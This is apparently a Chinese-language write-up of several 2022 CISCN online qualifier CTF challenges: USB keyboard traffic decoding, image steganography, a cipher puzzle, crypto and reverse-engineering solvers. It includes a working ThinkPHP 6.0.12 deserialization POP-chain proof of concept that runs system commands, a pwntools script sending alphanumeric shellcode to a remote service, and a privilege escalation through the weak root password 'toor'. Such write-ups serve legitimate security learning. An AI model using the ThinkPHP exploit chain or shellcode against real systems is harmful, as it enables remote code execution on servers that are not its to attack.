第15届全国大学生知识竞赛场景实操 2022ciscn线上初赛 部分writeup
@
ez_usb
拿到附件wireshark打开 观察
发现流量中存在两种键盘流量
过滤
usb.addr == "2.8.1" && usbhid.data跟usb.addr == "2.10.1" && usbhid.data
分别导出为csv文件
提取hid data
梭哈脚本,将流量包中有关USB HID的数据提取出来并转成十六进制,然后对比官方的USB HID表进行转码
USB HID Usage Tables 1.12(P52).pdf (book118.com)
DicData = {0x04: "A", 0x05: "B", 0x06: "C", 0x07: "D", 0x08: "E", 0x09: "F", 0x0A: "G", 0x0B: "H", 0x0C: "I", 0x0D: "J", 0x0E: "K", 0x0F: "L", 0x10: "M", 0x11: "N",
0x12: "O", 0x13: "P", 0x14: "Q", 0x15: "R", 0x16: "S", 0x17: "T", 0x18: "U", 0x19: "V", 0x1A: "W", 0x1B: "X", 0x1C: "Y", 0x1D: "Z", 0x1E: "1", 0x1F: "2",
0x20: "3", 0x21: "4", 0x22: "5", 0x23: "6", 0x24: "7", 0x25: "8", 0x26: "9", 0x27: "0", 0x28: "\n", 0x2A: "[DEL]", 0x2B: " ", 0x2C: " ", 0x2D: "-", 0x2E: "=",
0x2F: "[", 0x30: "]", 0x31: "\\", 0x32: "~", 0x33: ";", 0x34: "'", 0x36: ",", 0x37: ".", 0x38: "/", 0x57:"+", 0x58: "\n", 0x59: "1", 0x5A: "2", 0x5B: "3", 0x5C: "4",
0x5D: "5", 0x5E: "6", 0x5F: "7", 0x60: "8", 0x61: "9"
}
ListNumber = []
datas = open("2.txt")
for data in datas:
if int('0x' + data[4:6], 16) < 0x04 or int('0x' + data[4:6], 16) > 0xa0:
continue
ListNumber.append(int(data[4:6], 16))
datas.close()
print(ListNumber)
flag = ""
sign = 0
for number in ListNumber:
if sign == 0:
if number == 0x39:
sign = 1
continue
else:
flag += DicData[number].lower()
else:
if number == 0x39:
sign = 0
continue
else:
flag += DicData[number].upper()
print(flag)
得到
观察526177为rar文件hex开头,导入010editor中保存为rar文件,另一串为压缩包密码,解压得到flag
everlasting_night
拿到附件,stegsolve打开,观察a2通道有lsb隐写痕迹
使用工具梭哈:cloacked-pixel 秘钥为f78dcd383f1b574b
得到加密的压缩包
同时图片尾有一串多余的md5 fb3efce4ceac2f5445c7ae17e3e969ab
将此字符串为压缩包密码打开压缩包
使用010editor删除文件头后保存附件为flag.data,使用gimp打开修正宽高比为352:287 得到flag
问卷调查
填写问卷得到flag
签到电台
密码本内容
取前七个4位数字分别与弼时安全到达了的电码进行模10运算得到6449093660734572841578386746,通过burpsuite抓包发送两次得到flag
Ezpop
1、打开靶机,发现TP版本为V6.0.12
2、根据题目提示,百度搜索TP6.0.12的漏洞
3、找到一篇关于该版本TP反序列漏洞的文章
4、文章里面有现成的poc可以直接利用,接下来找到路由即可
5、访问/www.zip,下载题目的源码
6、全局搜索unserialize,在index.php下的index类中的test方法找到路由
7、利用poc生成payload,在/index.php/index/test/下POST提交,成功RCE
8、修改命令,最终在根目录下找到flag
POC如下:
<?php
namespace think\model\concern;
trait Attribute
{
private $data = ["key" => ["key1" => "cat /flag.txt"]];
private $withAttr = ["key"=>["key1"=>"system"]];
protected $json = ["key"];
}
namespace think;
abstract class Model
{
use model\concern\Attribute;
private $lazySave;
protected $withEvent;
private $exists;
private $force;
protected $table;
protected $jsonAssoc;
function __construct($obj = '')
{
$this->lazySave = true;
$this->withEvent = false;
$this->exists = true;
$this->force = true;
$this->table = $obj;
$this->jsonAssoc = true;
}
}
namespace think\model;
use think\Model;
class Pivot extends Model
{
}
$a = new Pivot();
$b = new Pivot($a);
echo urlencode(serialize($b));
基于挑战码的双向认证1、2
1、题目描述是ssh端口,直接ssh登录上去,发现cube-challenge文件
2、进去后没发现什么有用的东西
3、凭借web手的本能,利用正则寻找flag:find /| grep flag
4、在/root/cube-shell/instance/flag_server/发现flag1.txt和flag2.txt
5、尝试访问,发现flag没有设置访问权限,两个flag到手
基于挑战码的双向认证3
1、同样ssh连接,故技重施一波
2、找到flag位置,尝试访问,提示没有权限访问
3、查看当前linux版本,发现是Red Hat 4.8.5
4、尝试利用弱口令进行root提权,发现密码为toor,直接拿到flag
Iso9798
连接后通过sha256密码碰撞得到前四位输入进行交互
import hashlib
dic = 'abcdefghijklmnopqrstuvwxyz1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ'
for a in dic:
for b in dic:
for c in dic:
for d in dic:
t =str(a)+str(b)+str(c)+str(d)+'VsPPBo6CqCXA6om2'
m = (hashlib.sha256(t.encode())).hexdigest()
if m[:64] == '6c744733df904ddf1b75ac9cd690c117c3feec780f518ae6abbef054c1678f25':
print(t)
break
随机输入数字得到回显的加密密文
将密文分成三组,交换前两组位置后进行提交得到flag
Login-nomal
通过上述几处位置可知冒号前为指令,冒号后为参数,指令与指令之间通过“\n”划分,指令只有opt和msg,通过opt可进入函数,参数要为ro0t
分析可以发现再进入该函数即可执行shellcode,并且shellcode要可见
from pwn import *
io = remote("123.56.87.204",31166)
context.log_level = "debug"
io.recv()
shellcode = "Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t"
# gdb.attach(io)
# pause()
payload = "opt:1\n" + "msg:ro0t1\n"
io.sendline(payload)
payload = "opt:2\n" + "msg:" + shellcode + "\n"
io.sendline(payload)
io.interactive()
通过pwntools生成shellcode,并利用alpha3生成可见字符将shellcode填入exp中,交互得到flag
Baby-tree
浏览baby-tree.ast文件可发现以下几处可疑的地方
分析发现为AST语法树的内容,构造exp得到flag
keyValue = '345y'
values = [88,35,88,225,7,201,57,94,77,56,75,168,72,218,64,91,16,101,32,207,73,130,74,128,76,201,16,248,41,205,103,84,91,99,79,202,22,131,63,255,20,16]
k = [ord(i) for i in keyValue] # [51, 52, 53, 121]
# print(k)
for i in range(0, len(values)-4+1):
k[0], k[1], k[2], k[3] = k[1], k[2], k[3], k[0]
for i in range(len(values)-4, -1, -1):
k[1], k[2], k[3], k[0] = k[0], k[1], k[2], k[3]
r1 = values[i+3] ^ k[3]
r0 = values[i+2] ^ k[2]
r3 = values[i+1] ^ ((k[1] + (r1 >> 2)) & 0xff)
r2 = values[i+0] ^ ((k[0] + (r0 >> 4)) & 0xff)
values[i], values[i+1], values[i+2], values[i+3] = r0, r1, r2, r3
flag = ''
for c in values:
flag += chr(c)
print(flag)
